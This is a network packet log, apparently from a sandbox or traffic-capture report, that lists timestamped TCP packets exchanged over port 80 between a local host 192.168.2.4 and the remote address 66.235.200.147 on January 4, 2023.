Jan 4, 2023 16:47:45.472815990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472840071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472841978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472851992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472861052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472872972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472901106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473439932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473468065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473489046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473504066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473515034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473536015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473539114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473556042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473575115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473576069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473594904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473613977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473619938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473639965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473663092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473663092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473681927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473690987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473707914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473732948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473732948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473762035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473763943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473788977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473802090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473813057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473831892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473834991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473851919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473865986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473874092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473887920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473901987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473922968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473923922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473944902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.473952055 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.473978043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.474003077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.482810020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.482919931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.482952118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.482974052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483016968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483050108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483743906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483778000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483791113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483803034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483815908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483829021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483838081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483850002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483863115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483872890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483884096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483900070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483911991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483923912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483938932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483944893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483959913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483971119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.483985901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.483990908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484004974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484014034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484036922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484041929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484064102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484065056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484086037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484086990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484107971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484112024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484127998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484132051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484142065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484155893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484174967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484189034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484201908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484225035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484227896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484251976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484272957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484276056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484288931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484292030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484318972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484343052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484343052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484348059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484360933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484369993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484378099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484395981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484400034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484416962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484435081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484435081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484456062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484460115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484477043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484489918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484502077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484510899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484523058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484532118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484543085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484553099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484565973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484575987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484589100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484599113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484608889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484622955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484636068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484639883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484661102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484662056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484687090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484695911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484713078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484719992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484740019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484740973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484765053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484769106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484788895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484796047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484812021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484826088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484834909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484853983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484865904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484880924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484894991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484908104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.484935045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.484945059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.490782976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.490829945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.490951061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.490984917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.491012096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.491036892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.491055012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.491063118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.491077900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.491085052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.491096973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.491105080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.491122007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.491128922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.491142988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.491156101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.491178036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.491275072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492134094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492161036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492180109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492198944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492217064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492219925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492237091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492248058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492257118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492278099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492295027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492296934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492320061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492321014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492347002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492348909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492368937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492383003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492388964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492408037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492414951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492434025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492446899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492454052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492482901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492485046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492510080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492512941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492532969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492552042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492552996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492573023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492574930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492594004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492610931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492619038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492640018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492641926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492660046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492682934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492682934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492707014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492708921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492736101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492747068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492762089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492777109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492785931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492810965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492816925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492842913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492844105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492871046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492878914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492897034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492901087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492923975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492925882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492945910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492953062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492978096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.492979050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.492999077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493009090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493021965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493036985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493056059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493083954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493084908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493113041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493115902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493144035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493155956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493171930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493175983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493197918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493200064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493226051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493228912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493252039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493256092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493273020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493277073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493293047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493313074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493325949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493334055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493340969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493355989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493376970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493380070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493396044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493402004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493417025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493432045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493436098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493458033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493465900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493485928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493503094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493511915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493536949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493539095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493566990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493566990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493588924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493593931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493611097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493622065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493633986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493650913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493664026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493680000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493691921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493705988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493721962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493731976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493752003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493762016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493769884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493792057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493803024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493824005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493841887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493850946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493874073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493876934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493897915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493905067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493920088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493932962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493957043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493963003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.493983030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.493989944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494009018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494009972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494034052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494035959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494060040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494062901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494090080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494096994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494116068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494122982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494143009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494153023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494168997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494172096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494193077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494199991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494215965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494229078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494255066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494270086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494282007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494306087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494308949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494334936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494338036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494365931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494366884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494395971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494400978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494422913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494422913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494440079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494450092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494462013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494473934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494492054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494501114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494513988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494524956 CET	80	49696	66.235.200.147	192.168.2.4
